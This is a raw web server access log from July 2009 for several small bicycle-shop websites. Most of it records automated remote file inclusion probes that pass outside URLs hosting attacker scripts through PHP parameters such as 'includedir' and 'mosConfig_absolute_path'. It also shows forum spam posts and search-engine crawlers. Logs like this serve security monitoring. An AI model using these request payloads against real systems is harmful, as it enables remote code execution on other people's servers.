74.86.17.106 - - [09/Jul/2009:19:41:11 -0700] "GET /ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:41:12 -0700] "GET /translations//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:41:25 -0700] "GET /translations/Italian.txt%20//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:41:25 -0700] "GET /translations/Hungarian.txt%20//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:41:27 -0700] "GET /translations/Hungarian.txt%20//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:41:27 -0700] "GET /translations/Italian.txt%20//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:42:00 -0700] "GET /ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
209.172.33.230 - - [09/Jul/2009:19:42:00 -0700] "GET /translations//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
209.172.33.230 - - [09/Jul/2009:19:42:00 -0700] "GET /ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
209.172.33.230 - - [09/Jul/2009:19:42:00 -0700] "GET /translations//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
209.172.33.230 - - [09/Jul/2009:19:42:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
209.172.33.230 - - [09/Jul/2009:19:42:35 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.svbikes.com"
122.153.28.140 - - [09/Jul/2009:19:42:47 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /translations/Hungarian.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:08 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:08 -0700] "GET /translations/Swedish.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
174.37.196.178 - - [09/Jul/2009:19:43:36 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.00 (Windows NT 4.0; U; en)" "bicyclestoreshouston.com"
174.37.196.178 - - [09/Jul/2009:19:43:36 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Opera/9.00 (Windows NT 4.0; U; en)" "bicyclestoreshouston.com"
174.37.196.178 - - [09/Jul/2009:19:43:36 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Opera/9.00 (Windows NT 4.0; U; en)" "bicyclestoreshouston.com"
74.86.17.106 - - [09/Jul/2009:19:43:38 -0700] "GET /translations/Hungarian.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:38 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:38 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:44 -0700] "GET /translations/Swedish.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:51 -0700] "GET /translations/Swedish.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:51 -0700] "GET /translations//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:52 -0700] "GET /translations/Hungarian.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:43:52 -0700] "GET /ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:44:09 -0700] "GET /translations/Hungarian.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:44:10 -0700] "GET /translations/Swedish.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:44:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:44:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:44:56 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:21 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:25 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:26 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:45:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:45:41 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:45:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:43 -0700] "GET /translations/Italian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:45:43 -0700] "GET /translations/Hungarian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:46:38 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
74.86.17.106 - - [09/Jul/2009:19:46:38 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
74.86.17.106 - - [09/Jul/2009:19:46:41 -0700] "GET /translations/Italian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:46:41 -0700] "GET /translations/Hungarian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:46:43 -0700] "GET /translations/Italian.txt%20//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:46:43 -0700] "GET /translations/Hungarian.txt%20//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:17 -0700] "GET /translations/Hungarian.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:17 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:17 -0700] "GET /translations/Swedish.txt//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:17 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:19 -0700] "GET /ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:22 -0700] "GET /translations//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:22 -0700] "GET /translations/Swedish.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:47:23 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
74.86.17.106 - - [09/Jul/2009:19:47:23 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:47:31 -0700] "GET /translations/Hungarian.txt//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:36 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:36 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:36 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:47:36 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:48:47 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
74.86.17.106 - - [09/Jul/2009:19:48:47 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
91.121.150.170 - - [09/Jul/2009:19:48:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:49:15 -0700] "GET /translations/Hungarian.txt%20//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
65.55.106.123 - - [09/Jul/2009:19:49:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
74.86.17.106 - - [09/Jul/2009:19:49:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
74.86.17.106 - - [09/Jul/2009:19:49:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:49:42 -0700] "GET /translations/Hungarian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:49:42 -0700] "GET /translations/Italian.txt%20//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:19:50:45 -0700] "GET /ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:50:45 -0700] "GET /translations//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:50:49 -0700] "GET /ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:50:49 -0700] "GET /translations//ws/login.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:53:44 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
190.248.10.179 - - [09/Jul/2009:19:53:44 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.svbikes.com"
211.236.242.164 - - [09/Jul/2009:19:56:52 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:20:28:19 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:20:28:19 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:20:28:19 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:32:49 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:32:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:32:49 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:33:33 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:33:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:20:33:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:20:40:20 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:20:40:20 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.248.10.179 - - [09/Jul/2009:20:40:20 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
65.55.211.68 - - [09/Jul/2009:20:54:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.68 - - [09/Jul/2009:20:54:05 -0700] "GET /logs/access_081210.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
58.61.164.207 - - [09/Jul/2009:21:00:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://houstonbikeshop.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:21:18:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [09/Jul/2009:21:29:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jul/2009:21:35:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.193.75 - - [09/Jul/2009:21:44:57 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [09/Jul/2009:21:46:58 -0700] "GET /bullitinboard/viewtopic.php?p=11516 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
208.80.195.44 - - [09/Jul/2009:21:52:35 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt; Hotbar4.4.1.1415; SV1; SIMBAR Enabled; .NET CLR 1.1.4322)" "bicyclestoreshouston.com"
81.19.66.38 - - [09/Jul/2009:21:54:22 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:21:54:23 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:21:54:23 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:21:54:24 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:21:54:25 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
174.37.196.178 - - [09/Jul/2009:22:00:24 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "houstonbikeshop.com"
174.37.196.178 - - [09/Jul/2009:22:00:24 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "houstonbikeshop.com"
